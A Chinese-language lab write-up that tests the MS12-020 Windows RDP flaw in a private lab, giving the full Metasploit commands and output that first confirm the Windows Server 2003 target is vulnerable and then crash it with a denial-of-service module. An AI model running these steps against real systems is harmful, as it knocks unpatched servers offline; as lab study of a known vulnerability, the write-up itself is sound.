前言
攻擊者向受影響的系統發送一系列特製 RDP 數據包,則這個漏洞可能造成拒絕服務攻擊或允許遠程執行代碼。默認情況下,任何 Windows 操作系統都未啓用遠程桌面協議 (RDP,默認端口3389)。沒有啓用 RDP 的系統不受威脅。此實驗對目標系統造成了DOS攻擊。
0x01 實驗環境
攻擊機:kali linux
ip:192.168.8.130
目標機:windows server 2003 Enterprise x64 SP2
ip:192.168.8.129
0x02 漏洞驗證
使用msf的模塊:auxiliary/scanner/rdp/ms12_020_check驗證目標機是否具有此漏洞
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info
Name: MS12-020 Microsoft Remote Desktop Checker
Module: auxiliary/scanner/rdp/ms12_020_check
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Royce Davis "R3dy" <[email protected]>
Brandon McCann "zeknox" <[email protected]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.8.129 yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 100 yes The number of concurrent threads
Description:
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.
References:
https://cvedetails.com/cve/CVE-2012-0002/
https://technet.microsoft.com/en-us/library/security/MS12-020
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
https://www.exploit-db.com/exploits/18606
https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse
運行後顯示目標系統具有此漏洞:
msf auxiliary(ms12_020_check) > run
[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
0x03 漏洞利用
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.8.129 yes The target address
RPORT 3389 yes The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed
運行模塊後,目標系統windows server 2003 藍屏宕機: